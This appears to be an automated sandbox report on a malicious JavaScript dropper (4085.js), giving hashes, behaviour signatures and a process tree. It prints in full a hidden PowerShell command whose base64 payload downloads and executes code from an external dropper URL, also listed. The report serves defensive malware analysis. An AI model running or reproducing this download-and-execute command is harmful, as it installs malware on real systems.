Analysis
- max time kernel: 11s
- max time network: 41s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 10-08-2021 06:44
Static task: static1
Behavioral task: behavioral1
- Sample: 4085.js
- Resource: win7v20210410 (windows7_x64)
- 0 signatures
- 0 seconds
Behavioral task: behavioral2
- Sample: 4085.js
- Resource: win10v20210408 (windows10_x64)
- 0 signatures
- 0 seconds
General
- Target: 4085.js
- Size: 776KB
- MD5: b6e9c6f1113c92ad6757266ae75769a2
- SHA1: 9190e8d268db4deb7cd97624b17cba6617244699
- SHA256: 9fca4b9bb2238dec26fc6b6161dc9d62647883966f1cfd661537fb8c097ff4fe
- SHA512: 1684c2350b540da9326159455cb57937a2fefc1b97f1231c12cc66ffa601f71ce52096d5c37737d644c49b1c9ae7b5e33eb86890b1405a79d2aa364afbc1f09b
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): https://erzurum.us/65376345273497600381/tjTyjrjywrdmJoaaenvF/dll/assistant.php
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes (flow, pid, process): 7, 768, powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid, process): 768 powershell.exe; 768 powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description, pid, process): Token: SeDebugPrivilege, 768, powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description, pid, process, target process):
  PID 1096 wrote to memory of 1652: 1096 wscript.exe -> cmd.exe (listed 3 times)
  PID 1652 wrote to memory of 768: 1652 cmd.exe -> powershell.exe (listed 3 times)
Processes
- C:\Windows\system32\wscript.exe
  Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\4085.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBlAHIAegB1AHIAdQBtAC4AdQBzAC8ANgA1ADMANwA2ADMANAA1ADIANwAzADQAOQA3ADYAMAAwADMAOAAxAC8AdABqAFQAeQBqAHIAagB5AHcAcgBkAG0ASgBvAGEAYQBlAG4AdgBGAC8AZABsAGwALwBhAHMAcwBpAHMAdABhAG4AdAAuAHAAaABwACIAKQA=
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- memory/768-60-0x0000000000000000-mapping.dmp
- memory/768-61-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp (Filesize: 8KB)
- memory/768-62-0x0000000002360000-0x0000000002361000-memory.dmp (Filesize: 4KB)
- memory/768-63-0x000000001AC80000-0x000000001AC81000-memory.dmp (Filesize: 4KB)
- memory/768-64-0x00000000023B0000-0x00000000023B1000-memory.dmp (Filesize: 4KB)
- memory/768-65-0x00000000024E0000-0x00000000024E1000-memory.dmp (Filesize: 4KB)
- memory/768-67-0x000000001AC04000-0x000000001AC06000-memory.dmp (Filesize: 8KB)
- memory/768-66-0x000000001AC00000-0x000000001AC02000-memory.dmp (Filesize: 8KB)
- memory/768-68-0x000000001C500000-0x000000001C501000-memory.dmp (Filesize: 4KB)
- memory/1652-59-0x0000000000000000-mapping.dmp